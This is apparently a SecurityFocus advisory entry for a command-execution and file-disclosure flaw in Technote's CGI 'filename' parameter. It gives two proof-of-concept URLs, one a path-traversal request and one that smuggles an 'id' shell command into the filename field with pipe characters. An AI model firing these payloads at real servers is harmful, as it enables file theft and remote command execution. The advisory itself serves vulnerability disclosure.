Technote Inc Technote 'filename' Parameter Command Execution And File Disclosure Vulnerability

The following example has been provided by Ksecurity <ksecurity@iland.co.kr>:
http://www.example.com/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi

The following example has been provided for the code execution issue:
http://www.example.com/.../shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|

An exploit written in Perl is available:


 

Privacy Statement
Copyright 2010, SecurityFocus